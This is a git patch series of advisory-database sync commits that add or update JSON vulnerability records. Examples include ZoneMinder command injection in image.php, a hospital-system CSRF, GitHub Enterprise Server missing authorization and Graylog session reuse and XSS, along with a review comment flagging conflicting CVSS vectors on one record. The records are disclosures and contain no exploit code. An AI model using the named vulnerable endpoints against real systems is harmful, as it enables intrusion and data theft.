+ { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/13394550441557115bb74f6de9778c165755a7ab" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/653f8b6a091538b084715f259900f62c2ec1c6cf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/71dee092903adb496fe1f357b267d94087b679e0" + }, + { + "type": "WEB", + "url": 
"https://git.kernel.org/stable/c/7d31dde1bd8678115329e46dc8d7afb63c176b74" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json index 1ca49c2294cfa..a7b941c542df3 100644 --- a/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json +++ b/advisories/unreviewed/2026/02/GHSA-wfhp-qgm8-5p5c/GHSA-wfhp-qgm8-5p5c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wfhp-qgm8-5p5c", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-27100" ], "details": "Jenkins 2.550 and earlier, LTS 2.541.1 and earlier accepts Run Parameter values that refer to builds the user submitting the build does not have access to, allowing attackers with Item/Build and Item/Configure permission to obtain information about the existence of jobs, the existence of builds, and if a specified build exists, its display name.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T15:18:43Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json index a0236b79690b7..34a5ea5e82e9e 100644 --- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json 
+++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json
@@ -29,7 +29,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-287"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json
index ceb4a2d258e16..4c28aa477e6c3 100644
--- a/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json
+++ b/advisories/unreviewed/2026/02/GHSA-wxwg-9693-mqg4/GHSA-wxwg-9693-mqg4.json
@@ -33,7 +33,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-285"
+ ],
 "severity": "LOW",
 "github_reviewed": false,
 "github_reviewed_at": null,
diff --git a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json
index 3462e4bacb012..f88adbd5be477 100644
--- a/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json
+++ b/advisories/unreviewed/2026/02/GHSA-xfjv-gcf8-3jqc/GHSA-xfjv-gcf8-3jqc.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xfjv-gcf8-3jqc",
- "modified": "2026-02-06T09:30:28Z",
+ "modified": "2026-02-18T18:30:23Z",
 "published": "2026-02-06T09:30:28Z",
 "aliases": [
 "CVE-2026-21626"
 ],
 "details": "Access control settings for forum post custom fields are not applied to the JSON output type, leading to an ACL violation vector an information disclosure",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json
new file mode 100644
index 0000000000000..3c8a8c96cec47
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xw73-fccw-fgc4",
+ "modified": "2026-02-18T18:30:39Z",
+ "published": "2026-02-18T18:30:39Z",
+ "aliases": [
+ "CVE-2025-65791"
+ ],
+ "details": "ZoneMinder v1.36.34 is vulnerable to Command Injection in web/views/image.php. The application passes unsanitized user input directly to the exec() function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65791"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/rishavand1/CVE-2025-65791"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T16:22:29Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json
index 767d768b5a160..ee81c183161eb 100644
--- a/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json
+++ b/advisories/unreviewed/2026/02/GHSA-xw8j-p597-rjrj/GHSA-xw8j-p597-rjrj.json
@@ -41,7 +41,9 @@
 }
 ],
 "database_specific": {
- "cwe_ids": [],
+ "cwe_ids": [
+ "CWE-200"
+ ],
 "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
From 67ec8ed983718a3116435faf90f0d11455deef3b Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:32:49 +0000 Subject: [PATCH 015/174] Advisory Database Sync --- .../GHSA-v6c5-9mp4-mwq4.json | 6 +- .../GHSA-4cjv-rrcw-xg72.json | 3 +- .../GHSA-6979-fg32-9gg4.json | 3 +- .../GHSA-7p75-39p6-7499.json | 3 +- .../GHSA-rhph-mcqr-9p2p.json | 1 + .../GHSA-27xm-cj78-cxmr.json | 2 +- .../GHSA-2g52-f4rf-8vm9.json | 40 +++++++++++++ .../GHSA-2hcf-jfqx-g286.json | 40 +++++++++++++ .../GHSA-2q3j-wj77-9934.json | 56 +++++++++++++++++ .../GHSA-3crm-x896-j73p.json | 6 +- .../GHSA-43wm-f3cq-hfrw.json | 3 +- .../GHSA-47m2-7g75-xvrp.json | 6 +- .../GHSA-49xw-73mm-8fw9.json | 6 +- .../GHSA-4pq4-6gr5-cr69.json | 40 +++++++++++++ .../GHSA-55vh-w3p8-qq9g.json | 15 +++-- .../GHSA-5hp8-hwcv-h225.json | 6 +- .../GHSA-5pqm-c33h-22jc.json | 15 +++-- .../GHSA-62j7-j842-x6r6.json | 6 +- .../GHSA-7qhw-4fcq-2g37.json | 40 +++++++++++++ .../GHSA-844q-r72x-vfmv.json | 3 +- .../GHSA-86c5-9jxx-m8g7.json | 3 +- .../GHSA-8gfj-223w-87pr.json | 40 +++++++++++++ .../GHSA-8rqj-9226-cwx7.json | 15 +++-- .../GHSA-9f49-2j27-6f79.json | 44 ++++++++++++++ .../GHSA-9hwv-m488-9fjx.json | 3 +- .../GHSA-c96q-rf2r-2xj8.json | 48 +++++++++++++++ .../GHSA-cf26-rj67-f4wr.json | 6 +- .../GHSA-cq5p-w4x6-m6h3.json | 60 +++++++++++++++++++ .../GHSA-cw7v-qx8m-563q.json | 6 +- .../GHSA-ff7j-jwgr-hgxp.json | 6 +- .../GHSA-gq25-pccv-6q8j.json | 40 +++++++++++++ .../GHSA-gwrh-w4f9-ffc9.json | 60 +++++++++++++++++++ .../GHSA-h5jq-923c-7w8g.json | 40 +++++++++++++ .../GHSA-hcrc-x9p4-f9jh.json | 4 +- .../GHSA-jx8h-vrjj-cm6g.json | 52 ++++++++++++++++ .../GHSA-m4v3-95xp-3j5h.json | 15 +++-- .../GHSA-mjjq-x58m-rfxp.json | 60 +++++++++++++++++++ .../GHSA-p546-7whm-cxpm.json | 56 +++++++++++++++++ .../GHSA-pppv-pc54-6j8r.json | 56 +++++++++++++++++ .../GHSA-qrj7-4954-7p6v.json | 44 ++++++++++++++ .../GHSA-qxf4-rqx4-9mqj.json | 1 + .../GHSA-r9wp-qq53-qvjx.json | 56 +++++++++++++++++ .../GHSA-rcjr-qg8v-4c3v.json | 40 
+++++++++++++ .../GHSA-rwf8-6fj2-4vrx.json | 48 +++++++++++++++ .../GHSA-v3v9-r7ff-976x.json | 15 +++-- .../GHSA-vmr8-g4h2-2x5j.json | 52 ++++++++++++++++ .../GHSA-wjf9-j9vw-27f4.json | 40 +++++++++++++ .../GHSA-wrqv-g27w-82rr.json | 3 +- .../GHSA-xj75-gfvf-4g86.json | 42 +++++++++++++ .../GHSA-xjrj-8prq-9366.json | 3 +- .../GHSA-xqcm-jrw9-wq72.json | 14 ++++- .../GHSA-xrj7-v4x4-74hr.json | 40 +++++++++++++ 52 files changed, 1271 insertions(+), 41 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4pq4-6gr5-cr69/GHSA-4pq4-6gr5-cr69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7qhw-4fcq-2g37/GHSA-7qhw-4fcq-2g37.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8gfj-223w-87pr/GHSA-8gfj-223w-87pr.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9f49-2j27-6f79/GHSA-9f49-2j27-6f79.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c96q-rf2r-2xj8/GHSA-c96q-rf2r-2xj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-cq5p-w4x6-m6h3/GHSA-cq5p-w4x6-m6h3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gq25-pccv-6q8j/GHSA-gq25-pccv-6q8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gwrh-w4f9-ffc9/GHSA-gwrh-w4f9-ffc9.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h5jq-923c-7w8g/GHSA-h5jq-923c-7w8g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jx8h-vrjj-cm6g/GHSA-jx8h-vrjj-cm6g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mjjq-x58m-rfxp/GHSA-mjjq-x58m-rfxp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json create mode 100644 
advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json diff --git a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json index c8e47565d98ec..56a5e5890824d 100644 --- a/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json +++ b/advisories/unreviewed/2025/11/GHSA-v6c5-9mp4-mwq4/GHSA-v6c5-9mp4-mwq4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-v6c5-9mp4-mwq4", - "modified": "2026-02-13T18:31:23Z", + "modified": "2026-02-18T21:31:17Z", "published": "2025-11-26T15:34:12Z", "aliases": [ "CVE-2025-13601" @@ -35,6 +35,10 @@ "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-13601" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2026:2659" + }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2026:2563" diff --git a/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json b/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json index 215280ce9c12c..75af346fff00a 100644 --- a/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json +++ b/advisories/unreviewed/2026/01/GHSA-4cjv-rrcw-xg72/GHSA-4cjv-rrcw-xg72.json 
@@ -26,7 +26,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-122"
+ "CWE-122",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json b/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json
index 0115e473402b6..9d94cb0d3493c 100644
--- a/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json
+++ b/advisories/unreviewed/2026/01/GHSA-6979-fg32-9gg4/GHSA-6979-fg32-9gg4.json
@@ -26,7 +26,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-121"
+ "CWE-121",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json b/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json
index f87321f79bee0..629cf6777cc15 100644
--- a/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json
+++ b/advisories/unreviewed/2026/01/GHSA-7p75-39p6-7499/GHSA-7p75-39p6-7499.json
@@ -26,7 +26,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-121"
+ "CWE-121",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json b/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json
index af5bba60417e6..751a2a7b29967 100644
--- a/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json
+++ b/advisories/unreviewed/2026/01/GHSA-rhph-mcqr-9p2p/GHSA-rhph-mcqr-9p2p.json
@@ -26,6 +26,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
+ "CWE-77",
 "CWE-78"
 ],
 "severity": "HIGH",
diff --git a/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json b/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json
index b935b4bfd83c9..2284419712e9a 100644
--- a/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json
+++ b/advisories/unreviewed/2026/02/GHSA-27xm-cj78-cxmr/GHSA-27xm-cj78-cxmr.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-27xm-cj78-cxmr",
- "modified": "2026-02-17T18:32:58Z",
+ "modified": "2026-02-18T21:31:22Z",
 "published": "2026-02-17T18:32:57Z",
 "aliases": [
 "CVE-2025-13867"
diff --git a/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json b/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json
new file mode 100644
index 0000000000000..1eed2d623eb85
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2g52-f4rf-8vm9/GHSA-2g52-f4rf-8vm9.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2g52-f4rf-8vm9",
+ "modified": "2026-02-18T21:31:23Z",
+ "published": "2026-02-18T21:31:23Z",
+ "aliases": [
+ "CVE-2025-12343"
+ ],
+ "details": "A flaw was found in FFmpeg’s TensorFlow backend within the libavfilter/dnn_backend_tf.c source file. The issue occurs in the dnn_execute_model_tf() function, where a task object is freed multiple times in certain error-handling paths. This redundant memory deallocation can lead to a double-free condition, potentially causing FFmpeg or any application using it to crash when processing TensorFlow-based DNN models. This results in a denial-of-service scenario but does not allow arbitrary code execution under normal conditions.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12343"
+ },
+ {
+ "type": "WEB",
+ "url": "https://access.redhat.com/security/cve/CVE-2025-12343"
+ },
+ {
+ "type": "WEB",
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2406533"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-415"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T21:16:20Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json b/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json
new file mode 100644
index 0000000000000..1c2ea8ed72273
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2hcf-jfqx-g286/GHSA-2hcf-jfqx-g286.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2hcf-jfqx-g286",
+ "modified": "2026-02-18T21:31:22Z",
+ "published": "2026-02-18T21:31:22Z",
+ "aliases": [
+ "CVE-2025-70062"
+ ],
+ "details": "PHPGurukul Hospital Management System v4.0 contains a Cross-Site Request Forgery (CSRF) vulnerability in the 'Add Doctor' module. The application fails to enforce CSRF token validation on the add-doctor.php endpoint. This allows remote attackers to create arbitrary Doctor accounts (privileged users) by tricking an authenticated administrator into visiting a malicious page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70062"
+ },
+ {
+ "type": "WEB",
+ "url": "https://gist.github.com/Sanka1pp/78795abd84220e879ee0425159af5ae2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://packetstorm.news/files/id/213711"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T19:21:42Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json
new file mode 100644
index 0000000000000..adb0dfcf2a0b1
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2q3j-wj77-9934", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1355" + ], + "details": "A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to upload unauthorized content to another user’s repository migration export due to a missing authorization check in the repository migration upload endpoint. By supplying the migration identifier, an attacker could overwrite or replace a victim’s migration archive, potentially causing victims to download attacker-controlled repository data during migration restores or automated imports. An attacker would require authentication to the victim's GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.2, 3.18.5, 3.17.11, 3.16.14, 3.15.18, 3.14.23. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1355" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.23" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.18" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.14" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": 
"https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T21:16:23Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json
index f16f154739d21..aa98d74bfa7bd 100644
--- a/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json
+++ b/advisories/unreviewed/2026/02/GHSA-3crm-x896-j73p/GHSA-3crm-x896-j73p.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3crm-x896-j73p",
- "modified": "2026-02-18T15:31:26Z",
+ "modified": "2026-02-18T21:31:22Z",
 "published": "2026-02-18T15:31:26Z",
 "aliases": [
 "CVE-2026-1435"
 ],
 "details": "Not properly invalidated session vulnerability in Graylog Web Interface, version 2.2.3, due to incorrect management of session invalidation after new logins. The application generates a new 'sessionId' each time a user authenticates, but does not invalidate previously issued session identifiers, which remain valid even after multiple consecutive logins by the same user. As a result, a stolen or leaked 'sessionId' can continue to be used to authenticate valid requests. Exploiting this vulnerability would allow an attacker with access to the web service/API network (port 9000 or HTTP/S endpoint of the server) to reuse an old session token to gain unauthorized access to the application, interact with the API/web, and compromise the integrity of the affected account.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
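Review bot: The `CVSS_V3` entry added to `severity` for GHSA-3crm-x896-j73p rates availability impact High (`A:H`), while the `CVSS_V4` entry kept directly below it rates the same flaw `VA:N`, so the two vectors on this record disagree. The `details` text describes reuse of a `sessionId` that was never invalidated and names the integrity of the affected account as the consequence, which appears to fit the v4 vector better. Tooling that ranks by the v3 base score will triage this advisory as more severe than tooling that reads v4, so the v3 vector is worth confirming against the NVD record before the advisory is reviewed; if availability is not affected it would read `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`. The record continues past the end of this hunk, so whether `database_specific.severity` was updated to match is not visible here.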
diff --git a/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json b/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json
index a1d78ed65635d..3794a50329c10 100644
--- a/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json
+++ b/advisories/unreviewed/2026/02/GHSA-43wm-f3cq-hfrw/GHSA-43wm-f3cq-hfrw.json
@@ -42,7 +42,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-74"
+ "CWE-74",
+ "CWE-77"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json
index 92410cc1fc832..67d9d020fc092 100644
--- a/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json
+++ b/advisories/unreviewed/2026/02/GHSA-47m2-7g75-xvrp/GHSA-47m2-7g75-xvrp.json
@@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-47m2-7g75-xvrp", - "modified": "2026-02-18T15:31:26Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T15:31:26Z", "aliases": [ "CVE-2026-1440" ], "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/pipelines/' endpoint.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json index 3e7b6867826cb..14b4651484351 100644 --- a/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json +++ b/advisories/unreviewed/2026/02/GHSA-49xw-73mm-8fw9/GHSA-49xw-73mm-8fw9.json 
